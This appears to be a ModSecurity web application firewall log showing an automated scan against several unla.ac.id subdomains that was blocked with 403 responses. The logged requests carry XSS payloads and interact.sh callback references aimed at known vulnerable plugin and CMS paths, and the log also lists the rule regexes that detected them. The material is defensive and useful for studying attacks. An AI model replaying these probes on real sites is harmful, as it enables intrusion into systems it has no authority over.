[Tue Aug 29 11:53:53.548790 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO154cCo-f0AAAo2m8AAAAAA"]
[Tue Aug 29 11:53:53.548839 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAAowNtgAAAAH"]
[Tue Aug 29 11:53:53.569474 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAowNtkAAAAH"]
[Tue Aug 29 11:53:53.588223 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApJDU8AAAAY"]
[Tue Aug 29 11:53:53.589482 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApQ2VIAAAAb"]
[Tue Aug 29 11:53:53.591919 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApIdlkAAAAU"]
[Tue Aug 29 11:53:54.539504 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoW7V8AAAAJ"]
[Tue Aug 29 11:53:54.541042 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoLfXcAAAAG"]
[Tue Aug 29 11:53:54.542133 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoUJeYAAAAB"]
[Tue Aug 29 11:53:54.547460 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoGFg4AAAAE"]
[Tue Aug 29 11:53:54.557545 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAApOdb0AAAAL"]
[Tue Aug 29 11:53:54.567713 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154sCo-f0AAAoUJecAAAAB"]
[Tue Aug 29 11:53:54.614066 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154sCo-f0AAApLWk8AAAAI"]
[Tue Aug 29 11:53:55.595878 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAApJDVMAAAAY"]
[Tue Aug 29 11:53:55.600743 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAofm-QAAAAX"]
[Tue Aug 29 11:53:55.602878 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAolKbcAAAAe"]
[Tue Aug 29 11:53:55.614492 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoAk2UAAAAC"]
[Tue Aug 29 11:53:55.679784 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAApJDVQAAAAY"]
[Tue Aug 29 11:53:55.721401 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAox7MAAAAAN"]
[Tue Aug 29 11:53:55.814788 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoW7WUAAAAJ"]
[Tue Aug 29 11:53:55.852451 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoAk2gAAAAC"]
[Tue Aug 29 11:53:55.852627 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO1548Co-f0AAApOdcIAAAAL"]
[Tue Aug 29 11:53:55.860576 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoW7WYAAAAJ"]
[Tue Aug 29 11:53:55.903668 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoZ6U8AAAAK"]
[Tue Aug 29 11:53:56.560715 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAApJDVUAAAAY"]
[Tue Aug 29 11:53:56.572260 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: '><sVg/O found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAAoqbX4AAAAj"]
[Tue Aug 29 11:53:56.597357 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO155MCo-f0AAAoqbX8AAAAj"]
[Tue Aug 29 11:53:56.598772 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO155MCo-f0AAApJDVYAAAAY"]
[Tue Aug 29 11:53:56.619322 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAApJDVcAAAAY"]
[Tue Aug 29 11:53:56.627197 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoZ6VEAAAAK"]
